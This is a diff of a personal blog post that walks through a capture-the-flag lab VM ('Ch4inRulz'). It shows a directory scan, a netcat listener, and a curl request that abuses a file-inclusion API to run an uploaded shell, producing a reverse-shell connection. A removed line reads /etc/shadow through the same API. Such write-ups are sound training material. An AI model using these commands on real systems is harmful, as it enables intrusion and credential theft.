szorfein/szorfein.github.io/_posts/2018-10-14-CTF-Ch4inRulz.md

     $ dirb http://192.168.2.180/development/uploader ./probe-url.txt -u $(cat info)

+Yes, yes, we can do it manually too :p.

 ```txt
 ==> DIRECTORY: http://192.168.2.180/development/uploader/FRANKuploads/
 ```

-Well it's a bit of luck here lol.
-So our `shell.gif` is present, now, we start netcat to listen:
+Well it's a bit of luck here.
+So our `shell.gif` is present, now, we prepare our listener `netcat`:

     $ nc -lnvp 1234

 And we activate the shell.
-The file `passwd` than we found above reveal the path `/var/www` and we have the rest (`/development/uploader/FRANKuploads/`):
+The file `passwd` than we found above has reveal the path `/var/www` and we have the rest (`/development/uploader/FRANKuploads/`):

     $ curl -X POST -d "file=/var/www/development/uploader/FRANKuploads/shell.gif" http://192.168.2.180:8011/api/files_api.php

-And we have to execute this shell using the development site in command line.

-    $ curl -X POST -d "file=/etc/shadow" http://192.168.2.180:8011/api/files_api.php

 ```txt
 connect to [192.168.2.143] from (UNKNOWN) [192.168.2.180] 50186Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux